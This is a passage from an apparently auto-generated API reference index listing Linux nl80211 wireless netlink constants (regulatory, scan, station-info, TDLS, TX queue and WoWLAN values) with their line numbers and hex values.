NL80211_RRF_NO_80MHZ = 0x8000 constant NL80211_RRF_NO_CCK (line 5628) | NL80211_RRF_NO_CCK = 0x2 constant NL80211_RRF_NO_HE (line 5629) | NL80211_RRF_NO_HE = 0x20000 constant NL80211_RRF_NO_HT40 (line 5630) | NL80211_RRF_NO_HT40 = 0x6000 constant NL80211_RRF_NO_HT40MINUS (line 5631) | NL80211_RRF_NO_HT40MINUS = 0x2000 constant NL80211_RRF_NO_HT40PLUS (line 5632) | NL80211_RRF_NO_HT40PLUS = 0x4000 constant NL80211_RRF_NO_IBSS (line 5633) | NL80211_RRF_NO_IBSS = 0x80 constant NL80211_RRF_NO_INDOOR (line 5634) | NL80211_RRF_NO_INDOOR = 0x4 constant NL80211_RRF_NO_IR_ALL (line 5635) | NL80211_RRF_NO_IR_ALL = 0x180 constant NL80211_RRF_NO_IR (line 5636) | NL80211_RRF_NO_IR = 0x80 constant NL80211_RRF_NO_OFDM (line 5637) | NL80211_RRF_NO_OFDM = 0x1 constant NL80211_RRF_NO_OUTDOOR (line 5638) | NL80211_RRF_NO_OUTDOOR = 0x8 constant NL80211_RRF_PASSIVE_SCAN (line 5639) | NL80211_RRF_PASSIVE_SCAN = 0x80 constant NL80211_RRF_PTMP_ONLY (line 5640) | NL80211_RRF_PTMP_ONLY = 0x40 constant NL80211_RRF_PTP_ONLY (line 5641) | NL80211_RRF_PTP_ONLY = 0x20 constant NL80211_RXMGMT_FLAG_ANSWERED (line 5642) | NL80211_RXMGMT_FLAG_ANSWERED = 0x1 constant NL80211_RXMGMT_FLAG_EXTERNAL_AUTH (line 5643) | NL80211_RXMGMT_FLAG_EXTERNAL_AUTH = 0x2 constant NL80211_SAE_PWE_BOTH (line 5644) | NL80211_SAE_PWE_BOTH = 0x3 constant NL80211_SAE_PWE_HASH_TO_ELEMENT (line 5645) | NL80211_SAE_PWE_HASH_TO_ELEMENT = 0x2 constant NL80211_SAE_PWE_HUNT_AND_PECK (line 5646) | NL80211_SAE_PWE_HUNT_AND_PECK = 0x1 constant NL80211_SAE_PWE_UNSPECIFIED (line 5647) | NL80211_SAE_PWE_UNSPECIFIED = 0x0 constant NL80211_SAR_ATTR_MAX (line 5648) | NL80211_SAR_ATTR_MAX = 0x2 constant NL80211_SAR_ATTR_SPECS (line 5649) | NL80211_SAR_ATTR_SPECS = 0x2 constant NL80211_SAR_ATTR_SPECS_END_FREQ (line 5650) | NL80211_SAR_ATTR_SPECS_END_FREQ = 0x4 constant NL80211_SAR_ATTR_SPECS_MAX (line 5651) | NL80211_SAR_ATTR_SPECS_MAX = 0x4 constant NL80211_SAR_ATTR_SPECS_POWER (line 5652) | NL80211_SAR_ATTR_SPECS_POWER = 0x1 constant NL80211_SAR_ATTR_SPECS_RANGE_INDEX (line 5653) | NL80211_SAR_ATTR_SPECS_RANGE_INDEX = 0x2 constant NL80211_SAR_ATTR_SPECS_START_FREQ (line 5654) | NL80211_SAR_ATTR_SPECS_START_FREQ = 0x3 constant NL80211_SAR_ATTR_TYPE (line 5655) | NL80211_SAR_ATTR_TYPE = 0x1 constant NL80211_SAR_TYPE_POWER (line 5656) | NL80211_SAR_TYPE_POWER = 0x0 constant NL80211_SCAN_FLAG_ACCEPT_BCAST_PROBE_RESP (line 5657) | NL80211_SCAN_FLAG_ACCEPT_BCAST_PROBE_RESP = 0x20 constant NL80211_SCAN_FLAG_AP (line 5658) | NL80211_SCAN_FLAG_AP = 0x4 constant NL80211_SCAN_FLAG_COLOCATED_6GHZ (line 5659) | NL80211_SCAN_FLAG_COLOCATED_6GHZ = 0x4000 constant NL80211_SCAN_FLAG_FILS_MAX_CHANNEL_TIME (line 5660) | NL80211_SCAN_FLAG_FILS_MAX_CHANNEL_TIME = 0x10 constant NL80211_SCAN_FLAG_FLUSH (line 5661) | NL80211_SCAN_FLAG_FLUSH = 0x2 constant NL80211_SCAN_FLAG_FREQ_KHZ (line 5662) | NL80211_SCAN_FLAG_FREQ_KHZ = 0x2000 constant NL80211_SCAN_FLAG_HIGH_ACCURACY (line 5663) | NL80211_SCAN_FLAG_HIGH_ACCURACY = 0x400 constant NL80211_SCAN_FLAG_LOW_POWER (line 5664) | NL80211_SCAN_FLAG_LOW_POWER = 0x200 constant NL80211_SCAN_FLAG_LOW_PRIORITY (line 5665) | NL80211_SCAN_FLAG_LOW_PRIORITY = 0x1 constant NL80211_SCAN_FLAG_LOW_SPAN (line 5666) | NL80211_SCAN_FLAG_LOW_SPAN = 0x100 constant NL80211_SCAN_FLAG_MIN_PREQ_CONTENT (line 5667) | NL80211_SCAN_FLAG_MIN_PREQ_CONTENT = 0x1000 constant NL80211_SCAN_FLAG_OCE_PROBE_REQ_DEFERRAL_SUPPRESSION (line 5668) | NL80211_SCAN_FLAG_OCE_PROBE_REQ_DEFERRAL_SUPPRESSION = 0x80 constant NL80211_SCAN_FLAG_OCE_PROBE_REQ_HIGH_TX_RATE (line 5669) | NL80211_SCAN_FLAG_OCE_PROBE_REQ_HIGH_TX_RATE = 0x40 constant NL80211_SCAN_FLAG_RANDOM_ADDR (line 5670) | NL80211_SCAN_FLAG_RANDOM_ADDR = 0x8 constant NL80211_SCAN_FLAG_RANDOM_SN (line 5671) | NL80211_SCAN_FLAG_RANDOM_SN = 0x800 constant NL80211_SCAN_RSSI_THOLD_OFF (line 5672) | NL80211_SCAN_RSSI_THOLD_OFF = -0x12c constant NL80211_SCHED_SCAN_MATCH_ATTR_BSSID (line 5673) | NL80211_SCHED_SCAN_MATCH_ATTR_BSSID = 0x5 constant NL80211_SCHED_SCAN_MATCH_ATTR_MAX (line 5674) | NL80211_SCHED_SCAN_MATCH_ATTR_MAX = 0x6 constant NL80211_SCHED_SCAN_MATCH_ATTR_RELATIVE_RSSI (line 5675) | NL80211_SCHED_SCAN_MATCH_ATTR_RELATIVE_RSSI = 0x3 constant NL80211_SCHED_SCAN_MATCH_ATTR_RSSI_ADJUST (line 5676) | NL80211_SCHED_SCAN_MATCH_ATTR_RSSI_ADJUST = 0x4 constant NL80211_SCHED_SCAN_MATCH_ATTR_RSSI (line 5677) | NL80211_SCHED_SCAN_MATCH_ATTR_RSSI = 0x2 constant NL80211_SCHED_SCAN_MATCH_ATTR_SSID (line 5678) | NL80211_SCHED_SCAN_MATCH_ATTR_SSID = 0x1 constant NL80211_SCHED_SCAN_MATCH_PER_BAND_RSSI (line 5679) | NL80211_SCHED_SCAN_MATCH_PER_BAND_RSSI = 0x6 constant NL80211_SCHED_SCAN_PLAN_INTERVAL (line 5680) | NL80211_SCHED_SCAN_PLAN_INTERVAL = 0x1 constant NL80211_SCHED_SCAN_PLAN_ITERATIONS (line 5681) | NL80211_SCHED_SCAN_PLAN_ITERATIONS = 0x2 constant NL80211_SCHED_SCAN_PLAN_MAX (line 5682) | NL80211_SCHED_SCAN_PLAN_MAX = 0x2 constant NL80211_SMPS_DYNAMIC (line 5683) | NL80211_SMPS_DYNAMIC = 0x2 constant NL80211_SMPS_MAX (line 5684) | NL80211_SMPS_MAX = 0x2 constant NL80211_SMPS_OFF (line 5685) | NL80211_SMPS_OFF = 0x0 constant NL80211_SMPS_STATIC (line 5686) | NL80211_SMPS_STATIC = 0x1 constant NL80211_STA_BSS_PARAM_BEACON_INTERVAL (line 5687) | NL80211_STA_BSS_PARAM_BEACON_INTERVAL = 0x5 constant NL80211_STA_BSS_PARAM_CTS_PROT (line 5688) | NL80211_STA_BSS_PARAM_CTS_PROT = 0x1 constant NL80211_STA_BSS_PARAM_DTIM_PERIOD (line 5689) | NL80211_STA_BSS_PARAM_DTIM_PERIOD = 0x4 constant NL80211_STA_BSS_PARAM_MAX (line 5690) | NL80211_STA_BSS_PARAM_MAX = 0x5 constant NL80211_STA_BSS_PARAM_SHORT_PREAMBLE (line 5691) | NL80211_STA_BSS_PARAM_SHORT_PREAMBLE = 0x2 constant NL80211_STA_BSS_PARAM_SHORT_SLOT_TIME (line 5692) | NL80211_STA_BSS_PARAM_SHORT_SLOT_TIME = 0x3 constant NL80211_STA_FLAG_ASSOCIATED (line 5693) | NL80211_STA_FLAG_ASSOCIATED = 0x7 constant NL80211_STA_FLAG_AUTHENTICATED (line 5694) | NL80211_STA_FLAG_AUTHENTICATED = 0x5 constant NL80211_STA_FLAG_AUTHORIZED (line 5695) | NL80211_STA_FLAG_AUTHORIZED = 0x1 constant NL80211_STA_FLAG_MAX (line 5696) | NL80211_STA_FLAG_MAX = 0x7 constant NL80211_STA_FLAG_MAX_OLD_API (line 5697) | NL80211_STA_FLAG_MAX_OLD_API = 0x6 constant NL80211_STA_FLAG_MFP (line 5698) | NL80211_STA_FLAG_MFP = 0x4 constant NL80211_STA_FLAG_SHORT_PREAMBLE (line 5699) | NL80211_STA_FLAG_SHORT_PREAMBLE = 0x2 constant NL80211_STA_FLAG_TDLS_PEER (line 5700) | NL80211_STA_FLAG_TDLS_PEER = 0x6 constant NL80211_STA_FLAG_WME (line 5701) | NL80211_STA_FLAG_WME = 0x3 constant NL80211_STA_INFO_ACK_SIGNAL_AVG (line 5702) | NL80211_STA_INFO_ACK_SIGNAL_AVG = 0x23 constant NL80211_STA_INFO_ACK_SIGNAL (line 5703) | NL80211_STA_INFO_ACK_SIGNAL = 0x22 constant NL80211_STA_INFO_AIRTIME_LINK_METRIC (line 5704) | NL80211_STA_INFO_AIRTIME_LINK_METRIC = 0x29 constant NL80211_STA_INFO_AIRTIME_WEIGHT (line 5705) | NL80211_STA_INFO_AIRTIME_WEIGHT = 0x28 constant NL80211_STA_INFO_ASSOC_AT_BOOTTIME (line 5706) | NL80211_STA_INFO_ASSOC_AT_BOOTTIME = 0x2a constant NL80211_STA_INFO_BEACON_LOSS (line 5707) | NL80211_STA_INFO_BEACON_LOSS = 0x12 constant NL80211_STA_INFO_BEACON_RX (line 5708) | NL80211_STA_INFO_BEACON_RX = 0x1d constant NL80211_STA_INFO_BEACON_SIGNAL_AVG (line 5709) | NL80211_STA_INFO_BEACON_SIGNAL_AVG = 0x1e constant NL80211_STA_INFO_BSS_PARAM (line 5710) | NL80211_STA_INFO_BSS_PARAM = 0xf constant NL80211_STA_INFO_CHAIN_SIGNAL_AVG (line 5711) | NL80211_STA_INFO_CHAIN_SIGNAL_AVG = 0x1a constant NL80211_STA_INFO_CHAIN_SIGNAL (line 5712) | NL80211_STA_INFO_CHAIN_SIGNAL = 0x19 constant NL80211_STA_INFO_CONNECTED_TIME (line 5713) | NL80211_STA_INFO_CONNECTED_TIME = 0x10 constant NL80211_STA_INFO_CONNECTED_TO_AS (line 5714) | NL80211_STA_INFO_CONNECTED_TO_AS = 0x2b constant NL80211_STA_INFO_CONNECTED_TO_GATE (line 5715) | NL80211_STA_INFO_CONNECTED_TO_GATE = 0x26 constant NL80211_STA_INFO_DATA_ACK_SIGNAL_AVG (line 5716) | NL80211_STA_INFO_DATA_ACK_SIGNAL_AVG = 0x23 constant NL80211_STA_INFO_EXPECTED_THROUGHPUT (line 5717) | NL80211_STA_INFO_EXPECTED_THROUGHPUT = 0x1b constant NL80211_STA_INFO_FCS_ERROR_COUNT (line 5718) | NL80211_STA_INFO_FCS_ERROR_COUNT = 0x25 constant NL80211_STA_INFO_INACTIVE_TIME (line 5719) | NL80211_STA_INFO_INACTIVE_TIME = 0x1 constant NL80211_STA_INFO_LLID (line 5720) | NL80211_STA_INFO_LLID = 0x4 constant NL80211_STA_INFO_LOCAL_PM (line 5721) | NL80211_STA_INFO_LOCAL_PM = 0x14 constant NL80211_STA_INFO_MAX (line 5722) | NL80211_STA_INFO_MAX = 0x2b constant NL80211_STA_INFO_NONPEER_PM (line 5723) | NL80211_STA_INFO_NONPEER_PM = 0x16 constant NL80211_STA_INFO_PAD (line 5724) | NL80211_STA_INFO_PAD = 0x21 constant NL80211_STA_INFO_PEER_PM (line 5725) | NL80211_STA_INFO_PEER_PM = 0x15 constant NL80211_STA_INFO_PLID (line 5726) | NL80211_STA_INFO_PLID = 0x5 constant NL80211_STA_INFO_PLINK_STATE (line 5727) | NL80211_STA_INFO_PLINK_STATE = 0x6 constant NL80211_STA_INFO_RX_BITRATE (line 5728) | NL80211_STA_INFO_RX_BITRATE = 0xe constant NL80211_STA_INFO_RX_BYTES64 (line 5729) | NL80211_STA_INFO_RX_BYTES64 = 0x17 constant NL80211_STA_INFO_RX_BYTES (line 5730) | NL80211_STA_INFO_RX_BYTES = 0x2 constant NL80211_STA_INFO_RX_DROP_MISC (line 5731) | NL80211_STA_INFO_RX_DROP_MISC = 0x1c constant NL80211_STA_INFO_RX_DURATION (line 5732) | NL80211_STA_INFO_RX_DURATION = 0x20 constant NL80211_STA_INFO_RX_MPDUS (line 5733) | NL80211_STA_INFO_RX_MPDUS = 0x24 constant NL80211_STA_INFO_RX_PACKETS (line 5734) | NL80211_STA_INFO_RX_PACKETS = 0x9 constant NL80211_STA_INFO_SIGNAL_AVG (line 5735) | NL80211_STA_INFO_SIGNAL_AVG = 0xd constant NL80211_STA_INFO_SIGNAL (line 5736) | NL80211_STA_INFO_SIGNAL = 0x7 constant NL80211_STA_INFO_STA_FLAGS (line 5737) | NL80211_STA_INFO_STA_FLAGS = 0x11 constant NL80211_STA_INFO_TID_STATS (line 5738) | NL80211_STA_INFO_TID_STATS = 0x1f constant NL80211_STA_INFO_T_OFFSET (line 5739) | NL80211_STA_INFO_T_OFFSET = 0x13 constant NL80211_STA_INFO_TX_BITRATE (line 5740) | NL80211_STA_INFO_TX_BITRATE = 0x8 constant NL80211_STA_INFO_TX_BYTES64 (line 5741) | NL80211_STA_INFO_TX_BYTES64 = 0x18 constant NL80211_STA_INFO_TX_BYTES (line 5742) | NL80211_STA_INFO_TX_BYTES = 0x3 constant NL80211_STA_INFO_TX_DURATION (line 5743) | NL80211_STA_INFO_TX_DURATION = 0x27 constant NL80211_STA_INFO_TX_FAILED (line 5744) | NL80211_STA_INFO_TX_FAILED = 0xc constant NL80211_STA_INFO_TX_PACKETS (line 5745) | NL80211_STA_INFO_TX_PACKETS = 0xa constant NL80211_STA_INFO_TX_RETRIES (line 5746) | NL80211_STA_INFO_TX_RETRIES = 0xb constant NL80211_STA_WME_MAX (line 5747) | NL80211_STA_WME_MAX = 0x2 constant NL80211_STA_WME_MAX_SP (line 5748) | NL80211_STA_WME_MAX_SP = 0x2 constant NL80211_STA_WME_UAPSD_QUEUES (line 5749) | NL80211_STA_WME_UAPSD_QUEUES = 0x1 constant NL80211_SURVEY_INFO_CHANNEL_TIME_BUSY (line 5750) | NL80211_SURVEY_INFO_CHANNEL_TIME_BUSY = 0x5 constant NL80211_SURVEY_INFO_CHANNEL_TIME (line 5751) | NL80211_SURVEY_INFO_CHANNEL_TIME = 0x4 constant NL80211_SURVEY_INFO_CHANNEL_TIME_EXT_BUSY (line 5752) | NL80211_SURVEY_INFO_CHANNEL_TIME_EXT_BUSY = 0x6 constant NL80211_SURVEY_INFO_CHANNEL_TIME_RX (line 5753) | NL80211_SURVEY_INFO_CHANNEL_TIME_RX = 0x7 constant NL80211_SURVEY_INFO_CHANNEL_TIME_TX (line 5754) | NL80211_SURVEY_INFO_CHANNEL_TIME_TX = 0x8 constant NL80211_SURVEY_INFO_FREQUENCY (line 5755) | NL80211_SURVEY_INFO_FREQUENCY = 0x1 constant NL80211_SURVEY_INFO_FREQUENCY_OFFSET (line 5756) | NL80211_SURVEY_INFO_FREQUENCY_OFFSET = 0xc constant NL80211_SURVEY_INFO_IN_USE (line 5757) | NL80211_SURVEY_INFO_IN_USE = 0x3 constant NL80211_SURVEY_INFO_MAX (line 5758) | NL80211_SURVEY_INFO_MAX = 0xc constant NL80211_SURVEY_INFO_NOISE (line 5759) | NL80211_SURVEY_INFO_NOISE = 0x2 constant NL80211_SURVEY_INFO_PAD (line 5760) | NL80211_SURVEY_INFO_PAD = 0xa constant NL80211_SURVEY_INFO_TIME_BSS_RX (line 5761) | NL80211_SURVEY_INFO_TIME_BSS_RX = 0xb constant NL80211_SURVEY_INFO_TIME_BUSY (line 5762) | NL80211_SURVEY_INFO_TIME_BUSY = 0x5 constant NL80211_SURVEY_INFO_TIME (line 5763) | NL80211_SURVEY_INFO_TIME = 0x4 constant NL80211_SURVEY_INFO_TIME_EXT_BUSY (line 5764) | NL80211_SURVEY_INFO_TIME_EXT_BUSY = 0x6 constant NL80211_SURVEY_INFO_TIME_RX (line 5765) | NL80211_SURVEY_INFO_TIME_RX = 0x7 constant NL80211_SURVEY_INFO_TIME_SCAN (line 5766) | NL80211_SURVEY_INFO_TIME_SCAN = 0x9 constant NL80211_SURVEY_INFO_TIME_TX (line 5767) | NL80211_SURVEY_INFO_TIME_TX = 0x8 constant NL80211_TDLS_DISABLE_LINK (line 5768) | NL80211_TDLS_DISABLE_LINK = 0x4 constant NL80211_TDLS_DISCOVERY_REQ (line 5769) | NL80211_TDLS_DISCOVERY_REQ = 0x0 constant NL80211_TDLS_ENABLE_LINK (line 5770) | NL80211_TDLS_ENABLE_LINK = 0x3 constant NL80211_TDLS_PEER_HE (line 5771) | NL80211_TDLS_PEER_HE = 0x8 constant NL80211_TDLS_PEER_HT (line 5772) | NL80211_TDLS_PEER_HT = 0x1 constant NL80211_TDLS_PEER_VHT (line 5773) | NL80211_TDLS_PEER_VHT = 0x2 constant NL80211_TDLS_PEER_WMM (line 5774) | NL80211_TDLS_PEER_WMM = 0x4 constant NL80211_TDLS_SETUP (line 5775) | NL80211_TDLS_SETUP = 0x1 constant NL80211_TDLS_TEARDOWN (line 5776) | NL80211_TDLS_TEARDOWN = 0x2 constant NL80211_TID_CONFIG_ATTR_AMPDU_CTRL (line 5777) | NL80211_TID_CONFIG_ATTR_AMPDU_CTRL = 0x9 constant NL80211_TID_CONFIG_ATTR_AMSDU_CTRL (line 5778) | NL80211_TID_CONFIG_ATTR_AMSDU_CTRL = 0xb constant NL80211_TID_CONFIG_ATTR_MAX (line 5779) | NL80211_TID_CONFIG_ATTR_MAX = 0xd constant NL80211_TID_CONFIG_ATTR_NOACK (line 5780) | NL80211_TID_CONFIG_ATTR_NOACK = 0x6 constant NL80211_TID_CONFIG_ATTR_OVERRIDE (line 5781) | NL80211_TID_CONFIG_ATTR_OVERRIDE = 0x4 constant NL80211_TID_CONFIG_ATTR_PAD (line 5782) | NL80211_TID_CONFIG_ATTR_PAD = 0x1 constant NL80211_TID_CONFIG_ATTR_PEER_SUPP (line 5783) | NL80211_TID_CONFIG_ATTR_PEER_SUPP = 0x3 constant NL80211_TID_CONFIG_ATTR_RETRY_LONG (line 5784) | NL80211_TID_CONFIG_ATTR_RETRY_LONG = 0x8 constant NL80211_TID_CONFIG_ATTR_RETRY_SHORT (line 5785) | NL80211_TID_CONFIG_ATTR_RETRY_SHORT = 0x7 constant NL80211_TID_CONFIG_ATTR_RTSCTS_CTRL (line 5786) | NL80211_TID_CONFIG_ATTR_RTSCTS_CTRL = 0xa constant NL80211_TID_CONFIG_ATTR_TIDS (line 5787) | NL80211_TID_CONFIG_ATTR_TIDS = 0x5 constant NL80211_TID_CONFIG_ATTR_TX_RATE (line 5788) | NL80211_TID_CONFIG_ATTR_TX_RATE = 0xd constant NL80211_TID_CONFIG_ATTR_TX_RATE_TYPE (line 5789) | NL80211_TID_CONFIG_ATTR_TX_RATE_TYPE = 0xc constant NL80211_TID_CONFIG_ATTR_VIF_SUPP (line 5790) | NL80211_TID_CONFIG_ATTR_VIF_SUPP = 0x2 constant NL80211_TID_CONFIG_DISABLE (line 5791) | NL80211_TID_CONFIG_DISABLE = 0x1 constant NL80211_TID_CONFIG_ENABLE (line 5792) | NL80211_TID_CONFIG_ENABLE = 0x0 constant NL80211_TID_STATS_MAX (line 5793) | NL80211_TID_STATS_MAX = 0x6 constant NL80211_TID_STATS_PAD (line 5794) | NL80211_TID_STATS_PAD = 0x5 constant NL80211_TID_STATS_RX_MSDU (line 5795) | NL80211_TID_STATS_RX_MSDU = 0x1 constant NL80211_TID_STATS_TX_MSDU (line 5796) | NL80211_TID_STATS_TX_MSDU = 0x2 constant NL80211_TID_STATS_TX_MSDU_FAILED (line 5797) | NL80211_TID_STATS_TX_MSDU_FAILED = 0x4 constant NL80211_TID_STATS_TX_MSDU_RETRIES (line 5798) | NL80211_TID_STATS_TX_MSDU_RETRIES = 0x3 constant NL80211_TID_STATS_TXQ_STATS (line 5799) | NL80211_TID_STATS_TXQ_STATS = 0x6 constant NL80211_TIMEOUT_ASSOC (line 5800) | NL80211_TIMEOUT_ASSOC = 0x3 constant NL80211_TIMEOUT_AUTH (line 5801) | NL80211_TIMEOUT_AUTH = 0x2 constant NL80211_TIMEOUT_SCAN (line 5802) | NL80211_TIMEOUT_SCAN = 0x1 constant NL80211_TIMEOUT_UNSPECIFIED (line 5803) | NL80211_TIMEOUT_UNSPECIFIED = 0x0 constant NL80211_TKIP_DATA_OFFSET_ENCR_KEY (line 5804) | NL80211_TKIP_DATA_OFFSET_ENCR_KEY = 0x0 constant NL80211_TKIP_DATA_OFFSET_RX_MIC_KEY (line 5805) | NL80211_TKIP_DATA_OFFSET_RX_MIC_KEY = 0x18 constant NL80211_TKIP_DATA_OFFSET_TX_MIC_KEY (line 5806) | NL80211_TKIP_DATA_OFFSET_TX_MIC_KEY = 0x10 constant NL80211_TX_POWER_AUTOMATIC (line 5807) | NL80211_TX_POWER_AUTOMATIC = 0x0 constant NL80211_TX_POWER_FIXED (line 5808) | NL80211_TX_POWER_FIXED = 0x2 constant NL80211_TX_POWER_LIMITED (line 5809) | NL80211_TX_POWER_LIMITED = 0x1 constant NL80211_TXQ_ATTR_AC (line 5810) | NL80211_TXQ_ATTR_AC = 0x1 constant NL80211_TXQ_ATTR_AIFS (line 5811) | NL80211_TXQ_ATTR_AIFS = 0x5 constant NL80211_TXQ_ATTR_CWMAX (line 5812) | NL80211_TXQ_ATTR_CWMAX = 0x4 constant NL80211_TXQ_ATTR_CWMIN (line 5813) | NL80211_TXQ_ATTR_CWMIN = 0x3 constant NL80211_TXQ_ATTR_MAX (line 5814) | NL80211_TXQ_ATTR_MAX = 0x5 constant NL80211_TXQ_ATTR_QUEUE (line 5815) | NL80211_TXQ_ATTR_QUEUE = 0x1 constant NL80211_TXQ_ATTR_TXOP (line 5816) | NL80211_TXQ_ATTR_TXOP = 0x2 constant NL80211_TXQ_Q_BE (line 5817) | NL80211_TXQ_Q_BE = 0x2 constant NL80211_TXQ_Q_BK (line 5818) | NL80211_TXQ_Q_BK = 0x3 constant NL80211_TXQ_Q_VI (line 5819) | NL80211_TXQ_Q_VI = 0x1 constant NL80211_TXQ_Q_VO (line 5820) | NL80211_TXQ_Q_VO = 0x0 constant NL80211_TXQ_STATS_BACKLOG_BYTES (line 5821) | NL80211_TXQ_STATS_BACKLOG_BYTES = 0x1 constant NL80211_TXQ_STATS_BACKLOG_PACKETS (line 5822) | NL80211_TXQ_STATS_BACKLOG_PACKETS = 0x2 constant NL80211_TXQ_STATS_COLLISIONS (line 5823) | NL80211_TXQ_STATS_COLLISIONS = 0x8 constant NL80211_TXQ_STATS_DROPS (line 5824) | NL80211_TXQ_STATS_DROPS = 0x4 constant NL80211_TXQ_STATS_ECN_MARKS (line 5825) | NL80211_TXQ_STATS_ECN_MARKS = 0x5 constant NL80211_TXQ_STATS_FLOWS (line 5826) | NL80211_TXQ_STATS_FLOWS = 0x3 constant NL80211_TXQ_STATS_MAX (line 5827) | NL80211_TXQ_STATS_MAX = 0xb constant NL80211_TXQ_STATS_MAX_FLOWS (line 5828) | NL80211_TXQ_STATS_MAX_FLOWS = 0xb constant NL80211_TXQ_STATS_OVERLIMIT (line 5829) | NL80211_TXQ_STATS_OVERLIMIT = 0x6 constant NL80211_TXQ_STATS_OVERMEMORY (line 5830) | NL80211_TXQ_STATS_OVERMEMORY = 0x7 constant NL80211_TXQ_STATS_TX_BYTES (line 5831) | NL80211_TXQ_STATS_TX_BYTES = 0x9 constant NL80211_TXQ_STATS_TX_PACKETS (line 5832) | NL80211_TXQ_STATS_TX_PACKETS = 0xa constant NL80211_TX_RATE_AUTOMATIC (line 5833) | NL80211_TX_RATE_AUTOMATIC = 0x0 constant NL80211_TXRATE_DEFAULT_GI (line 5834) | NL80211_TXRATE_DEFAULT_GI = 0x0 constant NL80211_TX_RATE_FIXED (line 5835) | NL80211_TX_RATE_FIXED = 0x2 constant NL80211_TXRATE_FORCE_LGI (line 5836) | NL80211_TXRATE_FORCE_LGI = 0x2 constant NL80211_TXRATE_FORCE_SGI (line 5837) | NL80211_TXRATE_FORCE_SGI = 0x1 constant NL80211_TXRATE_GI (line 5838) | NL80211_TXRATE_GI = 0x4 constant NL80211_TXRATE_HE (line 5839) | NL80211_TXRATE_HE = 0x5 constant NL80211_TXRATE_HE_GI (line 5840) | NL80211_TXRATE_HE_GI = 0x6 constant NL80211_TXRATE_HE_LTF (line 5841) | NL80211_TXRATE_HE_LTF = 0x7 constant NL80211_TXRATE_HT (line 5842) | NL80211_TXRATE_HT = 0x2 constant NL80211_TXRATE_LEGACY (line 5843) | NL80211_TXRATE_LEGACY = 0x1 constant NL80211_TX_RATE_LIMITED (line 5844) | NL80211_TX_RATE_LIMITED = 0x1 constant NL80211_TXRATE_MAX (line 5845) | NL80211_TXRATE_MAX = 0x7 constant NL80211_TXRATE_MCS (line 5846) | NL80211_TXRATE_MCS = 0x2 constant NL80211_TXRATE_VHT (line 5847) | NL80211_TXRATE_VHT = 0x3 constant NL80211_UNSOL_BCAST_PROBE_RESP_ATTR_INT (line 5848) | NL80211_UNSOL_BCAST_PROBE_RESP_ATTR_INT = 0x1 constant NL80211_UNSOL_BCAST_PROBE_RESP_ATTR_MAX (line 5849) | NL80211_UNSOL_BCAST_PROBE_RESP_ATTR_MAX = 0x2 constant NL80211_UNSOL_BCAST_PROBE_RESP_ATTR_TMPL (line 5850) | NL80211_UNSOL_BCAST_PROBE_RESP_ATTR_TMPL = 0x2 constant NL80211_USER_REG_HINT_CELL_BASE (line 5851) | NL80211_USER_REG_HINT_CELL_BASE = 0x1 constant NL80211_USER_REG_HINT_INDOOR (line 5852) | NL80211_USER_REG_HINT_INDOOR = 0x2 constant NL80211_USER_REG_HINT_USER (line 5853) | NL80211_USER_REG_HINT_USER = 0x0 constant NL80211_VENDOR_ID_IS_LINUX (line 5854) | NL80211_VENDOR_ID_IS_LINUX = 0x80000000 constant NL80211_VHT_CAPABILITY_LEN (line 5855) | NL80211_VHT_CAPABILITY_LEN = 0xc constant NL80211_VHT_NSS_MAX (line 5856) | NL80211_VHT_NSS_MAX = 0x8 constant NL80211_WIPHY_NAME_MAXLEN (line 5857) | NL80211_WIPHY_NAME_MAXLEN = 0x40 constant NL80211_WMMR_AIFSN (line 5858) | NL80211_WMMR_AIFSN = 0x3 constant NL80211_WMMR_CW_MAX (line 5859) | NL80211_WMMR_CW_MAX = 0x2 constant NL80211_WMMR_CW_MIN (line 5860) | NL80211_WMMR_CW_MIN = 0x1 constant NL80211_WMMR_MAX (line 5861) | NL80211_WMMR_MAX = 0x4 constant NL80211_WMMR_TXOP (line 5862) | NL80211_WMMR_TXOP = 0x4 constant NL80211_WOWLAN_PKTPAT_MASK (line 5863) | NL80211_WOWLAN_PKTPAT_MASK = 0x1 constant NL80211_WOWLAN_PKTPAT_OFFSET (line 5864) | NL80211_WOWLAN_PKTPAT_OFFSET = 0x3 constant NL80211_WOWLAN_PKTPAT_PATTERN (line 5865) | NL80211_WOWLAN_PKTPAT_PATTERN = 0x2 constant NL80211_WOWLAN_TCP_DATA_INTERVAL (line 5866) | NL80211_WOWLAN_TCP_DATA_INTERVAL = 0x9 constant NL80211_WOWLAN_TCP_DATA_PAYLOAD (line 5867) | NL80211_WOWLAN_TCP_DATA_PAYLOAD = 0x6 constant NL80211_WOWLAN_TCP_DATA_PAYLOAD_SEQ (line 5868) | NL80211_WOWLAN_TCP_DATA_PAYLOAD_SEQ = 0x7 constant NL80211_WOWLAN_TCP_DATA_PAYLOAD_TOKEN (line 5869) | NL80211_WOWLAN_TCP_DATA_PAYLOAD_TOKEN = 0x8 constant NL80211_WOWLAN_TCP_DST_IPV4 (line 5870) | NL80211_WOWLAN_TCP_DST_IPV4 = 0x2 constant NL80211_WOWLAN_TCP_DST_MAC (line 5871) | NL80211_WOWLAN_TCP_DST_MAC = 0x3 constant NL80211_WOWLAN_TCP_DST_PORT (line 5872) | NL80211_WOWLAN_TCP_DST_PORT = 0x5 constant NL80211_WOWLAN_TCP_SRC_IPV4 (line 5873) | NL80211_WOWLAN_TCP_SRC_IPV4 = 0x1 constant NL80211_WOWLAN_TCP_SRC_PORT (line 5874) | NL80211_WOWLAN_TCP_SRC_PORT = 0x4 constant NL80211_WOWLAN_TCP_WAKE_MASK (line 5875) | NL80211_WOWLAN_TCP_WAKE_MASK = 0xb constant NL80211_WOWLAN_TCP_WAKE_PAYLOAD (line 5876) | NL80211_WOWLAN_TCP_WAKE_PAYLOAD = 0xa constant NL80211_WOWLAN_TRIG_4WAY_HANDSHAKE (line 5877) | NL80211_WOWLAN_TRIG_4WAY_HANDSHAKE = 0x8 constant NL80211_WOWLAN_TRIG_ANY (line 5878) | NL80211_WOWLAN_TRIG_ANY = 0x1 constant NL80211_WOWLAN_TRIG_DISCONNECT (line 5879) | NL80211_WOWLAN_TRIG_DISCONNECT = 0x2 constant NL80211_WOWLAN_TRIG_EAP_IDENT_REQUEST (line 5880) | NL80211_WOWLAN_TRIG_EAP_IDENT_REQUEST = 0x7 constant NL80211_WOWLAN_TRIG_GTK_REKEY_FAILURE (line 5881) | NL80211_WOWLAN_TRIG_GTK_REKEY_FAILURE = 0x6 constant NL80211_WOWLAN_TRIG_GTK_REKEY_SUPPORTED (line 5882) | NL80211_WOWLAN_TRIG_GTK_REKEY_SUPPORTED = 0x5 constant 